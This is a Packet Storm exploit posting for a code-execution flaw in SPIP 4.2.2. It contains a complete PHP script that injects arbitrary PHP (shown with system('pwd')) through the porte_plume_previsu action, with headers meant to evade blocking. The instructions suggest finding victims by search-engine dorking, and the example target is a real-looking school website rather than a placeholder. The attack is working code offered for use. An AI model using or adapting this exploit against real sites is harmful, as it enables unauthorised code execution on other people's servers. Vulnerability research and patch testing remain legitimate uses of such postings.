what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SPIP 4.2.2 Code Execution

SPIP 4.2.2 Code Execution
Posted Aug 28, 2024
Authored by indoushka

SPIP version 4.2.2 suffers from a code execution vulnerability.

tags | exploit, code execution
SHA-256 | d78efc5b1cfb078eb390b9ca3533108aac8d0c7cc7b9035d84d390b6af809aaf

SPIP 4.2.2 Code Execution

Change Mirror Download
=============================================================================================================================================
| # Title : SPIP 4.2.2 PHP Code execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.spip.net/ |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Line 49 : Set your target.

[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php

[+] Payload :

<?php

class IndoushkaExploit {
private $targetUrl;
private $payload;

public function __construct($targetUrl, $payload) {
$this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';
$this->payload = $this->generatePayload($payload);
}

private function generatePayload($payload) {
// توليد الحمولة مع تضمين الأمر المراد تنفيذه
return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";
}

public function exploit() {
// إعداد بيانات POST التي سيتم إرسالها إلى الهدف
$data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);

// تهيئة طلب HTTP باستخدام دالة cURL
$ch = curl_init($this->targetUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

// إضافة رؤوس مخصصة لتجاوز المنع
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/x-www-form-urlencoded',
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
]);

// تنفيذ الطلب
$response = curl_exec($ch);

// تحقق من وجود أخطاء في cURL
if (curl_errno($ch)) {
echo "cURL Error: " . curl_error($ch) . "\n";
} else {
echo "Exploit Sent! Response:\n";
echo $response;
}

curl_close($ch);
}
}

// مثال على الاستخدام
$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي
$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها

$exploit = new IndoushkaExploit($targetUrl, $payload);
$exploit->exploit();


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close